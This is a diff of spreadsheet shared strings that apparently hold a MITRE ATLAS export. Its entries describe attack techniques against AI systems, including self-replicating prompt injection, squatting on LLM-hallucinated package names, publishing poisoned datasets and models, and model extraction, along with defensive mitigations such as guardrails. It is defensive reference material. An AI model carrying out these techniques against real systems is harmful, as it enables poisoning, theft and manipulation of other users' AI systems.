@@ -607,6 +670,12 @@
     <t>Discover ML Model Ontology</t>
   </si>
   <si>
+    <t>Domains</t>
+  </si>
+  <si>
+    <t>Erode Dataset Integrity</t>
+  </si>
+  <si>
     <t>Erode ML Model Integrity</t>
   </si>
   <si>
@@ -637,7 +706,7 @@
     <t>Full ML Model Access</t>
   </si>
   <si>
-    <t>GPU Hardware</t>
+    <t>Hardware</t>
   </si>
   <si>
     <t>Indirect</t>
@@ -673,6 +742,9 @@
     <t>LLM Prompt Injection</t>
   </si>
   <si>
+    <t>LLM Prompt Self-Replication</t>
+  </si>
+  <si>
     <t>ML Artifact Collection</t>
   </si>
   <si>
@@ -682,9 +754,6 @@
     <t>ML Intellectual Property Theft</t>
   </si>
   <si>
-    <t>ML Model Inference API Access</t>
-  </si>
-  <si>
     <t>ML Software</t>
   </si>
   <si>
@@ -694,6 +763,9 @@
     <t>ML-Enabled Product or Service</t>
   </si>
   <si>
+    <t>Malicious Package</t>
+  </si>
+  <si>
     <t>Manual Modification</t>
   </si>
   <si>
@@ -709,6 +781,9 @@
     <t>Phishing</t>
   </si>
   <si>
+    <t>Physical Countermeasures</t>
+  </si>
+  <si>
     <t>Physical Environment Access</t>
   </si>
   <si>
@@ -721,9 +796,15 @@
     <t>Pre-Print Repositories</t>
   </si>
   <si>
+    <t>Publish Hallucinated Entities</t>
+  </si>
+  <si>
     <t>Publish Poisoned Datasets</t>
   </si>
   <si>
+    <t>Publish Poisoned Models</t>
+  </si>
+  <si>
     <t>Reputational Harm</t>
   </si>
   <si>
@@ -784,14 +865,19 @@
     <t>White-Box Optimization</t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may buy, lease, or rent infrastructure for use throughout their operation.
+    <t>Adversaries may gain access to a model via legitimate access to the inference API.
+Inference API access can be a source of information to the adversary ([Discover ML Model Ontology](/techniques/AML.T0013), [Discover ML Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade ML Model](/techniques/AML.T0015), [Erode ML Model Integrity](/techniques/AML.T0031)).
+Many systems rely on the same models provided via an inference API, which means they share the same vulnerabilities. This is especially true of foundation models which are prohibitively resource intensive to train. Adversaries may use their access to model APIs to identify vulnerabilities such as jailbreaks or hallucinations and then target applications that use the same models.</t>
+  </si>
+  <si>
+    <t>Adversaries may buy, lease, or rent infrastructure for use throughout their operation.
 A wide variety of infrastructure exists for hosting and orchestrating adversary operations.
 Infrastructure solutions include physical or cloud servers, domains, mobile devices, and third-party web services.
 Free resources may also be used, but they are typically limited.
+Infrastructure can also include physical components such as countermeasures that degrade or disrupt AI components or sensors, including printed materials, wearables, or disguises.
 Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation.
 Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services.
-Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
-</t>
+Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may search public sources, including cloud storage, public-facing services, and software or data repositories, to identify machine learning artifacts.
@@ -827,7 +913,7 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">In Black-Box attacks, the adversary has black-box (i.e. [ML Model Inference API Access](/techniques/AML.T0040) via API access) access to the target model.
+    <t xml:space="preserve">In Black-Box attacks, the adversary has black-box (i.e. [AI Model Inference API Access](/techniques/AML.T0040) via API access) access to the target model.
 With black-box attacks, the adversary may be using an API that the victim is monitoring.
 These attacks are generally less effective and require more inferences than [White-Box Optimization](/techniques/AML.T0043.000) attacks, but they require much less access.
 </t>
@@ -837,7 +923,7 @@
 The adversary uses [White-Box Optimization](/techniques/AML.T0043.000) on the proxy models to generate adversarial examples.
 If the set of proxy models are close enough to the target model, the adversarial example should generalize from one to another.
 This means that an attack that works for the proxy models will likely then work for the target model.
-If the adversary has [ML Model Inference API Access](/techniques/AML.T0040), they may use [Verify Attack](/techniques/AML.T0042) to confirm the attack is working and incorporate that information into their training process.
+If the adversary has [AI Model Inference API Access](/techniques/AML.T0040), they may use [Verify Attack](/techniques/AML.T0042) to confirm the attack is working and incorporate that information into their training process.
 </t>
   </si>
   <si>
@@ -919,6 +1005,14 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may discover model outputs, such as class scores, whose presence is not required for the system to function and are not intended for use by the end user. Model outputs may be found in logs or may be included in API responses.
+Model outputs may enable the adversary to identify weaknesses in the model and develop attacks.</t>
+  </si>
+  <si>
+    <t>Adversaries may prompt large language models and identify hallucinated entities.
+They may request software packages, commands, URLs, organization names, or e-mail addresses, and identify hallucinations with no connected real-world source. Discovered hallucinations provide the adversary with potential targets to [Publish Hallucinated Entities](/techniques/AML.T0060). Different LLMs have been shown to produce the same hallucinations, so the hallucinations exploited by an adversary may affect users of other LLMs.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may search private sources to identify machine learning artifacts that exist on the system and gather information about them.
 These artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.
 This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.
@@ -939,6 +1033,13 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
+Adversaries may use acquired domains for a variety of purposes (see [ATT&amp;CK](https://attack.mitre.org/techniques/T1583/001/)). Large AI datasets are often distributed as a list of URLs to individual datapoints. Adversaries may acquire expired domains that are included in these datasets and replace individual datapoints with poisoned examples ([Publish Poisoned Datasets](/techniques/AML.T0019)).</t>
+  </si>
+  <si>
+    <t>Adversaries may poison or manipulate portions of a dataset to reduce its usefulness, reduce trust, and cause users to waste resources correcting errors.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may degrade the target model's performance with adversarial data inputs to erode confidence in the system over time.
 This can lead to the victim organization wasting time and money both attempting to fix the system and performing the tasks it was meant to automate by hand.
 </t>
@@ -959,7 +1060,7 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may exfiltrate private information via [ML Model Inference API Access](/techniques/AML.T0040).
+    <t xml:space="preserve">Adversaries may exfiltrate private information via [AI Model Inference API Access](/techniques/AML.T0040).
 ML Models have been shown leak private information about their training data (e.g.  [Infer Training Data Membership](/techniques/AML.T0024.000), [Invert ML Model](/techniques/AML.T0024.001)).
 The model itself may also be extracted ([Extract ML Model](/techniques/AML.T0024.002)) for the purposes of [ML Intellectual Property Theft](/techniques/AML.T0048.004).
 Exfiltration of information relating to private training data raises privacy concerns.
@@ -977,7 +1078,7 @@
   </si>
   <si>
     <t xml:space="preserve">Adversaries may extract a functional copy of a private model.
-By repeatedly querying the victim's [ML Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
+By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
 The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
 Adversaries may extract the model to avoid paying per query in a machine learning as a service setting.
 Model extraction is used for [ML Intellectual Property Theft](/techniques/AML.T0048.004).
@@ -994,9 +1095,7 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Most machine learning systems require access to certain specialized hardware, typically GPUs.
-Adversaries can target machine learning systems by specifically targeting the GPU supply chain.
-</t>
+    <t>Adversaries may target AI systems by disrupting or manipulating the hardware supply chain. AI models often run on specialized hardware such as GPUs, TPUs, or embedded devices, but may also be optimized to operate on CPUs.</t>
   </si>
   <si>
     <t xml:space="preserve">An adversary may inject prompts indirectly via separate data channel ingested by the LLM such as include text or multimedia pulled from databases or websites.
@@ -1070,6 +1169,9 @@
 </t>
   </si>
   <si>
+    <t>An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may collect ML artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [ML Attack Staging](/tactics/AML.TA0001).
 ML artifacts include models and datasets as well as other telemetry data produced when interacting with a model.
 </t>
@@ -1089,11 +1191,6 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may gain access to a model via legitimate access to the inference API.
-Inference API access can be a source of information to the adversary ([Discover ML Model Ontology](/techniques/AML.T0013), [Discover ML Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade ML Model](/techniques/AML.T0015), [Erode ML Model Integrity](/techniques/AML.T0031)).
-</t>
-  </si>
-  <si>
     <t xml:space="preserve">Most machine learning systems rely on a limited set of machine learning frameworks.
 An adversary could get access to a large number of machine learning systems through a comprise of one of their supply chains.
 Many machine learning projects also rely on other open source implementations of various algorithms.
@@ -1102,7 +1199,7 @@
   </si>
   <si>
     <t xml:space="preserve">Adversaries may gain initial access to a system by compromising the unique portions of the ML supply chain.
-This could include [GPU Hardware](/techniques/AML.T0010.000), [Data](/techniques/AML.T0010.002) and its annotations, parts of the ML [ML Software](/techniques/AML.T0010.001) stack, or the [Model](/techniques/AML.T0010.003) itself.
+This could include [Hardware](/techniques/AML.T0010.000), [Data](/techniques/AML.T0010.002) and its annotations, parts of the ML [ML Software](/techniques/AML.T0010.001) stack, or the [Model](/techniques/AML.T0010.003) itself.
 In some instances the attacker will need secondary access to fully carry out an attack using compromised components of the supply chain.
 </t>
   </si>
@@ -1110,6 +1207,10 @@
     <t xml:space="preserve">Adversaries may use a product or service that uses machine learning under the hood to gain access to the underlying machine learning model.
 This type of indirect model access may reveal details of the ML model or its inferences in logs or metadata.
 </t>
+  </si>
+  <si>
+    <t>Adversaries may develop malicious software packages that when imported by a user have a deleterious effect.
+Malicious packages may behave as expected to the user. They may be introduced via [ML Supply Chain Compromise](/techniques/AML.T0010). They may not present as obviously malicious to the user and may appear to be useful for an AI-related task.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may manually modify the input data to craft adversarial data.
@@ -1143,6 +1244,10 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may acquire or manufacture physical countermeasures to aid or support their attack.
+These components may be used to disrupt or degrade the model, such as adversarial patterns printed on stickers or T-shirts, disguises, or decoys. They may also be used to disrupt or degrade the sensors used in capturing data, such as laser pointers, light bulbs, or other tools.</t>
+  </si>
+  <si>
     <t xml:space="preserve">In addition to the attacks that take place purely in the digital domain, adversaries may also exploit the physical environment for their attacks.
 If the model is interacting with data collected from the real world in some way, the adversary can influence the model through access to wherever the data is being collected.
 By modifying the data in the collection process, the adversary can perform modified versions of attacks designed for digital access.
@@ -1169,10 +1274,16 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may create an entity they control, such as a software package, website, or email address to a source hallucinated by an LLM. The hallucinations may take the form of package names commands, URLs, company names, or email addresses that point the victim to the entity controlled by the adversary. When the victim interacts with the adversary-controlled entity, the attack can proceed.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may [Poison Training Data](/techniques/AML.T0020) and publish it to a public location.
 The poisoned dataset may be a novel dataset or a poisoned variant of an existing open source dataset.
 This data may be introduced to a victim system via [ML Supply Chain Compromise](/techniques/AML.T0010).
 </t>
+  </si>
+  <si>
+    <t>Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [ML Supply Chain Compromise](/techniques/AML.T0010).</t>
   </si>
   <si>
     <t xml:space="preserve">Reputational harm involves a degradation of public perception and trust in organizations.  Examples of reputation-harming incidents include scandals or false impersonations.
@@ -1248,7 +1359,7 @@
   </si>
   <si>
     <t xml:space="preserve">Adversaries may replicate a private model.
-By repeatedly querying the victim's [ML Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
+By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
 The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
 A replicated model that closely mimic's the target model is a valuable resource in staging the attack.
 The adversary can use the replicated model to [Craft Adversarial Data](/techniques/AML.T0043) for various purposes (e.g. [Evade ML Model](/techniques/AML.T0015), [Spamming ML System with Chaff Data](/techniques/AML.T0046)).
@@ -1302,6 +1413,9 @@
 </t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0040</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0008</t>
   </si>
   <si>
@@ -1362,6 +1476,12 @@
     <t>https://atlas.mitre.org/techniques/AML.T0051.000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0063</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0062</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0007</t>
   </si>
   <si>
@@ -1371,6 +1491,12 @@
     <t>https://atlas.mitre.org/techniques/AML.T0013</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0008.002</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0059</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0031</t>
   </si>
   <si>
@@ -1437,6 +1563,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0051</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0061</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0035</t>
   </si>
   <si>
@@ -1446,9 +1575,6 @@
     <t>https://atlas.mitre.org/techniques/AML.T0048.004</t>
   </si>
   <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0040</t>
-  </si>
-  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0010.001</t>
   </si>
   <si>
@@ -1458,6 +1584,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0047</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0011.001</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0043.003</t>
   </si>
   <si>
@@ -1473,6 +1602,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0052</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0008.003</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0041</t>
   </si>
   <si>
@@ -1485,9 +1617,15 @@
     <t>https://atlas.mitre.org/techniques/AML.T0000.001</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0060</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0019</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0058</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0048.001</t>
   </si>
   <si>
@@ -1548,9 +1686,42 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
+    <t>13 May 2021</t>
+  </si>
+  <si>
+    <t>25 October 2023</t>
+  </si>
+  <si>
+    <t>28 February 2023</t>
+  </si>
+  <si>
+    <t>24 January 2022</t>
+  </si>
+  <si>
+    <t>01 October 2024</t>
+  </si>
+  <si>
+    <t>27 October 2022</t>
+  </si>
+  <si>
+    <t>18 January 2023</t>
+  </si>
+  <si>
+    <t>12 January 2024</t>
+  </si>
+  <si>
+    <t>12 October 2023</t>
+  </si>
+  <si>
     <t>11 March 2024</t>
   </si>
   <si>
+    <t>29 April 2024</t>
+  </si>
+  <si>
+    <t>ML Model Access</t>
+  </si>
+  <si>
     <t>Resource Development</t>
   </si>
   <si>
@@ -1587,9 +1758,6 @@
     <t>Exfiltration</t>
   </si>
   <si>
-    <t>ML Model Access</t>
-  </si>
-  <si>
     <t>Defense Evasion, Privilege Escalation</t>
   </si>
   <si>
@@ -1599,6 +1767,9 @@
     <t>Execution, Privilege Escalation</t>
   </si>
   <si>
+    <t>Persistence</t>
+  </si>
+  <si>
     <t>Persistence, Resource Development</t>
   </si>
   <si>
@@ -1650,52 +1821,49 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--b88656b8-92b5-48c8-aa0d-401d09225c3a</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--8407dd06-d298-4fcb-b42c-5e459685d96c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--aea8785b-aff2-4ffb-97a9-724e16802cd0</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--38834033-1aaf-4fac-a120-baae566da1f4</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--560abc82-7f87-4ae5-8d5a-18e0de351c4e</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--86985fad-fc0c-4b01-9441-f1c005dc529e</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--f84385a0-14f1-41d0-8256-02e34d3b6fd1</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--332194a6-2b0b-445e-900f-28c5588d3996</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--eec9cdf5-d82d-4b12-8d7c-5bcf661c4c8c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--7343b749-f8e5-4bc5-88a3-78b80a05456c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--a2b28f78-92b9-476f-968c-427462a3d057</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d7e6e3f1-7033-47a0-b162-51cffda7932a</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--0bdff1ba-04fb-43bc-9559-de278508fe94</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d59655a1-d955-47af-bea8-a776ae7383bb</t>
+    <t>x-mitre-tactic--76d8d1bc-98fb-406a-a88d-a70649ad9365</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--b7c3883a-1ae7-47cd-bd53-024c79ac833a</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--35a4b685-8a9f-4f66-bef0-92c8a5fd8411</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--b3f5fda4-a31a-4a74-9588-995b143d3436</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--b777d4af-fbe8-4e44-9917-c5c5542a7147</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--55e80a13-be94-43ba-aa57-e6c5cb822864</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--4386734e-fa57-4700-95b8-e76b8cab8ab3</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--14ef1e2d-f902-450a-a7e8-b032e318bb86</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--528bc2da-8855-44c0-9e45-ab92c179bf6f</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--2666e534-bf47-4656-9404-e90afe41f4a7</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--4a088a36-6786-4486-a3ea-3c3576d61daa</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--ef06a48d-1ccb-42c6-b5dd-2770a58f02d8</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--9ceaa8fe-57f1-4923-a4a5-121b5111139c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--1fa998a1-d720-488c-b156-b569fe4e6308</t>
   </si>
   <si>
     <t>Defense Evasion</t>
-  </si>
-  <si>
-    <t>Persistence</t>
   </si>
   <si>
     <t>Privilege Escalation</t>
@@ -1730,7 +1898,7 @@
     <t xml:space="preserve">The adversary is trying to run malicious code embedded in machine learning artifacts or software.
 Execution consists of techniques that result in adversary-controlled code running on a local or remote system.
 Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.
-For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.
+For example, an adversary might use a remote access tool to run a PowerShell script that does [Remote System Discovery](https://attack.mitre.org/techniques/T1018/).
 </t>
   </si>
   <si>
@@ -1759,7 +1927,7 @@
     <t xml:space="preserve">The adversary is leveraging their knowledge of and access to the target system to tailor the attack.
 ML Attack Staging consists of techniques adversaries use to prepare their attack on the target ML model.
 Techniques can include training proxy models, poisoning the target model, and crafting adversarial data to feed the target model.
-Some of these techniques can be performed in an offline manor and are thus difficult to mitigate.
+Some of these techniques can be performed in an offline manner and are thus difficult to mitigate.
 These techniques are often used to achieve the adversary's end goal.
 </t>
   </si>
@@ -1790,7 +1958,7 @@
   <si>
     <t xml:space="preserve">The adversary is trying to gather information about the machine learning system they can use to plan future operations.
 Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting.
-Such information may include details of the victim organizations machine learning capabilities and research efforts.
+Such information may include details of the victim organizations' machine learning capabilities and research efforts.
 This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to obtain relevant ML artifacts, targeting ML capabilities used by the victim, tailoring attacks to the particular models used by the victim, or to drive and lead further Reconnaissance efforts.
 </t>
   </si>
@@ -1799,7 +1967,7 @@
 Resource Development consists of techniques that involve adversaries creating,
 purchasing, or compromising/stealing resources that can be used to support targeting.
 Such resources include machine learning artifacts, infrastructure, accounts, or capabilities.
-These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as ML Attack Staging.
+These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as [ML Attack Staging](/tactics/AML.TA0001).
 </t>
   </si>
   <si>
@@ -1845,9 +2013,18 @@
     <t>https://atlas.mitre.org/tactics/AML.TA0003</t>
   </si>
   <si>
+    <t>29 October 2024</t>
+  </si>
+  <si>
     <t>relationship citations</t>
   </si>
   <si>
+    <t>AML.M0023</t>
+  </si>
+  <si>
+    <t>AML.M0024</t>
+  </si>
+  <si>
     <t>AML.M0015</t>
   </si>
   <si>
@@ -1863,6 +2040,15 @@
     <t>AML.M0012</t>
   </si>
   <si>
+    <t>AML.M0020</t>
+  </si>
+  <si>
+    <t>AML.M0021</t>
+  </si>
+  <si>
+    <t>AML.M0022</t>
+  </si>
+  <si>
     <t>AML.M0010</t>
   </si>
   <si>
@@ -1872,6 +2058,9 @@
     <t>AML.M0000</t>
   </si>
   <si>
+    <t>AML.M0025</t>
+  </si>
+  <si>
     <t>AML.M0017</t>
   </si>
   <si>
@@ -1908,64 +2097,88 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--b7d1db40-dd7b-4b7d-b803-1283b7c4f55e</t>
-  </si>
-  <si>
-    <t>course-of-action--c48829c8-5581-45d6-a34a-112aa85d704c</t>
-  </si>
-  <si>
-    <t>course-of-action--374749c7-19c4-49ee-8267-f3ea862157a7</t>
-  </si>
-  <si>
-    <t>course-of-action--6b26a096-3222-48ec-bf45-c30f320cbd2a</t>
-  </si>
-  <si>
-    <t>course-of-action--55038247-dea1-4414-8d8d-2278818d0f7e</t>
-  </si>
-  <si>
-    <t>course-of-action--fa399546-7037-4e50-bd5b-3d41f3997812</t>
-  </si>
-  <si>
-    <t>course-of-action--b56f6da0-2051-401e-89e2-a63e156872d5</t>
-  </si>
-  <si>
-    <t>course-of-action--3686113d-731b-42b6-9d36-efcbca71c3b7</t>
-  </si>
-  <si>
-    <t>course-of-action--9994c985-080a-4652-bfc0-28b19059fac2</t>
-  </si>
-  <si>
-    <t>course-of-action--b4066cd9-3bb6-4a89-8f32-7f207168d086</t>
-  </si>
-  <si>
-    <t>course-of-action--df57183e-147b-4caf-bffc-ee6265aa99f2</t>
-  </si>
-  <si>
-    <t>course-of-action--836bd250-7e46-4c9c-801b-b2d82132d429</t>
-  </si>
-  <si>
-    <t>course-of-action--656b4297-4395-4efc-9396-cf08523518c2</t>
-  </si>
-  <si>
-    <t>course-of-action--5ab160b2-9de8-4ade-b5bb-aa516f04f9da</t>
-  </si>
-  <si>
-    <t>course-of-action--5a4a5a17-16a8-4a02-b1a3-6ad3c72c95e3</t>
-  </si>
-  <si>
-    <t>course-of-action--488b2d71-b7b9-403d-85d0-48aef040007d</t>
-  </si>
-  <si>
-    <t>course-of-action--0408cdf3-2274-4f06-be37-7724c34a0ac7</t>
-  </si>
-  <si>
-    <t>course-of-action--f32006de-3282-47c6-ae96-11e13d132283</t>
-  </si>
-  <si>
-    <t>course-of-action--1341b145-8eaf-471f-b090-b5bf24164b64</t>
-  </si>
-  <si>
-    <t>course-of-action--632e55d7-462b-44a8-a652-cbb7f64328d2</t>
+    <t>course-of-action--1f63b56d-034f-477d-ab49-399c1aa1a22a</t>
+  </si>
+  <si>
+    <t>course-of-action--fa5108b2-3dc8-42dc-93a3-902f1bf74521</t>
+  </si>
+  <si>
+    <t>course-of-action--0ed2ef71-cdc9-4eef-8432-1c3dadbdda20</t>
+  </si>
+  <si>
+    <t>course-of-action--88073b07-2fe9-41cb-8e76-6e244fbabc74</t>
+  </si>
+  <si>
+    <t>course-of-action--0025dadf-7900-497f-aa03-39f0e319f20e</t>
+  </si>
+  <si>
+    <t>course-of-action--7b00dd51-f719-433d-afd6-3d386f64386d</t>
+  </si>
+  <si>
+    <t>course-of-action--aad92d43-774b-4612-8437-8d6c7ee7e4af</t>
+  </si>
+  <si>
+    <t>course-of-action--b8511570-3320-4733-a0e1-134e376e7530</t>
+  </si>
+  <si>
+    <t>course-of-action--d55bd0c8-2db0-400b-9097-c7cec00e2b91</t>
+  </si>
+  <si>
+    <t>course-of-action--1fca595d-b140-4ce0-8fd8-c4c6bee87540</t>
+  </si>
+  <si>
+    <t>course-of-action--73a34f24-1ad1-4421-b9c8-c2cbd13e6f47</t>
+  </si>
+  <si>
+    <t>course-of-action--79c75215-ada9-4c22-bfed-7d13fb6e966e</t>
+  </si>
+  <si>
+    <t>course-of-action--40076545-e797-4508-a294-943096a12111</t>
+  </si>
+  <si>
+    <t>course-of-action--005a5427-4b1e-41c2-a7aa-eda9ae9a9815</t>
+  </si>
+  <si>
+    <t>course-of-action--432c3a44-3974-4b73-9eb9-fa5dd5298e47</t>
+  </si>
+  <si>
+    <t>course-of-action--216f862c-7f34-4676-a913-c4ec6cc4c2cd</t>
+  </si>
+  <si>
+    <t>course-of-action--9f92e876-e2c0-4def-afee-626a4a79c524</t>
+  </si>
+  <si>
+    <t>course-of-action--179e00cb-0948-4282-9132-f8a1f0ff6bd7</t>
+  </si>
+  <si>
+    <t>course-of-action--46b3e92d-600b-47c9-80f5-ed62a5db0377</t>
+  </si>
+  <si>
+    <t>course-of-action--9395d240-cc32-452a-911b-04feea01bcfb</t>
+  </si>
+  <si>
+    <t>course-of-action--dcb586a2-1135-4e2a-97bd-d4adbc79758b</t>
+  </si>
+  <si>
+    <t>course-of-action--1bb9d9a7-c05a-470f-a709-64bd240e2eb0</t>
+  </si>
+  <si>
+    <t>course-of-action--cce983e7-13a2-4545-8c39-ec6c8dff148d</t>
+  </si>
+  <si>
+    <t>course-of-action--01c2ec0a-e257-4a75-9e59-f71aa6362b6e</t>
+  </si>
+  <si>
+    <t>course-of-action--cdccb3ab-2dde-41a9-a988-783a25b7bd00</t>
+  </si>
+  <si>
+    <t>course-of-action--79752061-aac1-4ed9-b7f3-3b4dc5e81280</t>
+  </si>
+  <si>
+    <t>AI Bill of Materials</t>
+  </si>
+  <si>
+    <t>AI Telemetry Logging</t>
   </si>
   <si>
     <t>Adversarial Input Detection</t>
@@ -1983,13 +2196,25 @@
     <t>Encrypt Sensitive Information</t>
   </si>
   <si>
+    <t>Generative AI Guardrails</t>
+  </si>
+  <si>
+    <t>Generative AI Guidelines</t>
+  </si>
+  <si>
+    <t>Generative AI Model Alignment</t>
+  </si>
+  <si>
     <t>Input Restoration</t>
   </si>
   <si>
     <t>Limit Model Artifact Release</t>
   </si>
   <si>
-    <t>Limit Release of Public Information</t>
+    <t>Limit Public Release of Information</t>
+  </si>
+  <si>
+    <t>Maintain AI Dataset Provenance</t>
   </si>
   <si>
     <t>Model Distribution Methods</t>
@@ -2026,6 +2251,13 @@
   </si>
   <si>
     <t>Vulnerability Scanning</t>
+  </si>
+  <si>
+    <t>An AI Bill of Materials (AI BOM) contains a full listing of artifacts and resources that were used in building the AI. The AI BOM can help mitigate supply chain risks and enable rapid response to reported vulnerabilities.
+This can include maintaining dataset provenance, i.e. a detailed history of datasets used for AI applications. The history can include information about the dataset source as well as well as a complete record of any modifications.</t>
+  </si>
+  <si>
+    <t>Implement logging of inputs and outputs of deployed AI models. Monitoring logs can help to detect security threats and mitigate impacts.</t>
   </si>
   <si>
     <t xml:space="preserve">Detect and block adversarial inputs or atypical queries that deviate from known benign behavior, exhibit behavior patterns observed in previous attacks or that come from potentially malicious IPs.
@@ -2050,6 +2282,18 @@
 </t>
   </si>
   <si>
+    <t>Guardrails are safety controls that are placed between a generative AI model and the output shared with the user to prevent undesired inputs and outputs.
+Guardrails can take the form of validators such as filters, rule-based logic, or regular expressions, as well as AI-based approaches, such as classifiers and utilizing LLMs, or named entity recognition (NER) to evaluate the safety of the prompt or response. Domain specific methods can be employed to reduce risks in a variety of areas such as etiquette, brand damage, jailbreaking, false information, code exploits, SQL injections, and data leakage.</t>
+  </si>
+  <si>
+    <t>Guidelines are safety controls that are placed between user-provided input and a generative AI model to help direct the model to produce desired outputs and prevent undesired outputs.
+Guidelines can be implemented as instructions appended to all user prompts or as part of the instructions in the system prompt. They can define the goal(s), role, and voice of the system, as well as outline safety and security parameters.</t>
+  </si>
+  <si>
